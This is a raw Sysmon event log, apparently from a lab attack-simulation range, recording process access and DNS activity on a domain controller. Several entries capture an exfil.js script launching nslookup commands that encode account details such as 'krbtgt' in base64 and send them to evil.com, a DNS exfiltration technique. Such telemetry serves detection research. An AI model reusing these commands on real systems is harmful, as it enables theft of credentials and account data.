4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-C03E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.158{2E1864BB-17A1-629A-783D-000000005F02}55527060C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-C03E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.160{2E1864BB-17B0-629A-C03E-000000005F02}8100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlallmr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.142{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlicde.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000196478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.750{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52336- 354300x8000000000000000196477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.750{00000000-0000-0000-0000-000000000000}7508<unknown process>-udptruefalse127.0.0.1-52336-false127.0.0.1-53domain 354300x8000000000000000196476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52335- 354300x8000000000000000196475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52334- 354300x8000000000000000196474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52333- 354300x8000000000000000196473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.614{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-52333-false127.0.0.1-53domain 354300x8000000000000000196472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.454{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52332- 354300x8000000000000000196471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.453{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52331- 354300x8000000000000000196470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.452{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52330- 354300x8000000000000000196469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52329- 354300x8000000000000000196468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52328- 354300x8000000000000000196467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52327- 354300x8000000000000000196466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.327{00000000-0000-0000-0000-000000000000}2900<unknown process>-udptruefalse127.0.0.1-52327-false127.0.0.1-53domain 354300x8000000000000000196465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52326- 354300x8000000000000000196464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52325- 354300x8000000000000000196463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.179{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52324- 354300x8000000000000000196462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.179{00000000-0000-0000-0000-000000000000}3360<unknown process>-udptruefalse127.0.0.1-52324-false127.0.0.1-53domain 354300x8000000000000000196461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52323- 354300x8000000000000000196460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.061{00000000-0000-0000-0000-000000000000}968<unknown process>-udptruefalse127.0.0.1-52323-false127.0.0.1-53domain 354300x8000000000000000196459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.977{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52322- 354300x8000000000000000196458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.977{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52321- 354300x8000000000000000196457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.977{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52320- 354300x8000000000000000196456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.977{00000000-0000-0000-0000-000000000000}4156<unknown process>-udptruefalse127.0.0.1-52320-false127.0.0.1-53domain 354300x8000000000000000196455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.821{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52319- 354300x8000000000000000196454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.821{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52318- 354300x8000000000000000196453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.820{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52317- 354300x8000000000000000196452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.820{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-52317-false127.0.0.1-53domain 10341000x8000000000000000196451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-17B0-629A-BE3E-000000005F02}34607672C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-BF3E-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-BF3E-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-17AF-629A-BD3E-000000005F02}62006140C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-BF3E-000000005F02}1344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.104{2E1864BB-17B0-629A-BF3E-000000005F02}1344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-BD3E-000000005F02}6200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlicde.tmp 2>&1 10341000x8000000000000000196443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.026{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-BE3E-000000005F02}3460C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.026{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-BE3E-000000005F02}3460C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.023{2E1864BB-17B0-629A-BE3E-000000005F02}34607672C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-BD3E-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.004{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-BE3E-000000005F02}3460C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 